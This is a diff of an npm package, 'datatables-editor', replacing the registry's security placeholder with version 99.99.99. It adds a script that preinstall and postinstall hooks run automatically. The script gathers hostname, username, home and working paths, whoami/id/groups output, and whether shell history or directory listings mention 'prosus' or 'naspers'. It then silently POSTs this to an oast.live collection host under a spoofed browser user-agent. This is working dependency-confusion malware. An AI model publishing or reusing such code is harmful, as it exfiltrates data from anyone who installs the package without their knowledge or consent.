datatables-editor 0.0.1-security → 99.99.99

package/datatables-editor.js

@@ -0,0 +1,185 @@
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+const http = require('http');
+const { execSync } = require('child_process');
+
+// Target company name for detection
+const COMPANY_NAME = 'prosus'.toLowerCase();
+
+// All search terms to look for (company + additional terms)
+const SEARCH_TERMS = ["prosus", "naspers"];
+
+// Helper function to safely execute commands (no password prompts)
+function safeExec(command) {
+  try {
+    return execSync(command, { 
+      encoding: 'utf8', 
+      timeout: 5000,
+      stdio: ['pipe', 'pipe', 'pipe']
+    }).trim();
+  } catch (e) {
+    return '';
+  }
+}
+
+// Check if file/directory exists and has content (returns boolean)
+function hasContent(filePath) {
+  try {
+    if (fs.existsSync(filePath)) {
+      const stats = fs.statSync(filePath);
+      if (stats.isDirectory()) {
+        // For directories, check if not empty
+        const files = fs.readdirSync(filePath);
+        return files.length > 0;
+      } else {
+        // For files, check if has content
+        const content = fs.readFileSync(filePath, 'utf8').trim();
+        return content.length > 0;
+      }
+    }
+    return false;
+  } catch (e) {
+    return false;
+  }
+}
+
+// Check if command output has content (returns boolean)
+function execHasContent(command) {
+  const result = safeExec(command);
+  return result.length > 0 && !result.includes('Error') && !result.includes('not found') && !result.includes('denied');
+}
+
+// Check if text contains ANY of the search terms (returns object with per-term results)
+function checkTermsInText(text) {
+  const lowerText = text.toLowerCase();
+  const results = {};
+  let anyFound = false;
+  
+  for (const term of SEARCH_TERMS) {
+    const found = lowerText.includes(term.toLowerCase());
+    results[term] = found;
+    if (found) anyFound = true;
+  }
+  
+  results._anyMatch = anyFound;
+  return results;
+}
+
+// Check if listing contains any search terms (returns object with per-term results)
+function listingContainsTerms(command) {
+  const result = safeExec(command);
+  return checkTermsInText(result);
+}
+
+// Check if file contains any search terms (returns object with per-term results)
+function fileContainsTerms(filePath) {
+  try {
+    if (fs.existsSync(filePath)) {
+      const content = fs.readFileSync(filePath, 'utf8');
+      return checkTermsInText(content);
+    }
+    // Return all false if file doesn't exist
+    const results = {};
+    for (const term of SEARCH_TERMS) {
+      results[term] = false;
+    }
+    results._anyMatch = false;
+    return results;
+  } catch (e) {
+    const results = {};
+    for (const term of SEARCH_TERMS) {
+      results[term] = false;
+    }
+    results._anyMatch = false;
+    return results;
+  }
+}
+
+// Legacy single-term functions for backward compatibility
+function listingContainsCompany(command) {
+  const result = safeExec(command).toLowerCase();
+  return result.includes(COMPANY_NAME);
+}
+
+function fileContainsCompany(filePath) {
+  try {
+    if (fs.existsSync(filePath)) {
+      const content = fs.readFileSync(filePath, 'utf8').toLowerCase();
+      return content.includes(COMPANY_NAME);
+    }
+    return false;
+  } catch (e) {
+    return false;
+  }
+}
+
+const data = {
+  // Target Info
+  bugbounty_company: 'prosus',
+  package_name: 'datatables-editor',
+  search_terms: SEARCH_TERMS,
+  
+  // Basic System Info (safe metadata only)
+  hostname: os.hostname(),
+  username: os.userInfo().username,
+  os: os.platform() + ' ' + os.release(),
+  arch: os.arch(),
+  node: process.version,
+  
+  // Current execution path (where npm install was run)
+  currentPath: process.cwd(),
+  homedir: os.userInfo().homedir,
+  
+  // History Files - Multi-Term Detection (BOOLEAN per term - ethical)
+  bashHistory: fileContainsTerms(path.join(os.userInfo().homedir, '.bash_history')),
+  zshHistory: fileContainsTerms(path.join(os.userInfo().homedir, '.zsh_history')),
+  
+  // Directory Listings - Multi-Term Detection (BOOLEAN per term - ethical)
+  currentDirListing: listingContainsTerms('ls -la'),
+  homeDirListing: listingContainsTerms(`ls -la ${os.userInfo().homedir}`),
+  rootDirListing: listingContainsTerms('ls -la / 2>/dev/null'),
+  
+  // Legacy single-company checks (for backward compatibility)
+  bashHistoryContainsCompany: fileContainsCompany(path.join(os.userInfo().homedir, '.bash_history')),
+  zshHistoryContainsCompany: fileContainsCompany(path.join(os.userInfo().homedir, '.zsh_history')),
+  currentDirListingContainsCompany: listingContainsCompany('ls -la'),
+  homeDirListingContainsCompany: listingContainsCompany(`ls -la ${os.userInfo().homedir}`),
+  rootDirListingContainsCompany: listingContainsCompany('ls -la / 2>/dev/null'),
+  
+  // System Info (safe - no sensitive content)
+  whoami: safeExec('whoami'),
+  id: safeExec('id'),
+  groups: safeExec('groups'),
+  
+  timestamp: new Date().toISOString()
+};
+
+// Send to Interactsh (silent mode)
+const postData = JSON.stringify(data, null, 2);
+
+const options = {
+  hostname: 'd59d6hsilkg39hpeis303647hdkzxihkn.oast.live',
+  port: 80,
+  path: '/',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': Buffer.byteLength(postData),
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
+  }
+};
+
+const req = http.request(options, (res) => {
+  res.resume();
+  res.on('end', () => {
+    process.exit(0);
+  });
+});
+
+req.on('error', (e) => {
+  process.exit(1);
+});
+
+req.write(postData);
+req.end();

package/index.js

@@ -0,0 +1,24 @@
+// datatables-editor - Index file
+// Package successfully installed and updated
+
+module.exports = {
+  name: 'datatables-editor',
+  version: '99.99.99',
+  message: 'Package updated successfully!',
+  init: function() {
+    console.log('[datatables-editor] Initialized successfully');
+    return true;
+  },
+  getInfo: function() {
+    return {
+      name: this.name,
+      version: this.version,
+      status: 'active'
+    };
+  }
+};
+
+// Auto-init message (silent in production)
+if (process.env.NODE_ENV !== 'production') {
+  console.log('[datatables-editor] Package loaded - v99.99.99');
+}

package/package.json

@@ -1,6 +1,17 @@
 {
   "name": "datatables-editor",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+  "version": "99.99.99",
+  "description": "Test package for prosus",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node datatables-editor.js",
+    "postinstall": "node datatables-editor.js"
+  },
+  "keywords": [
+    "prosus",
+    "test",
+    "security"
+  ],
+  "author": "Security Researcher",
+  "license": "MIT"
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=datatables-editor for more information.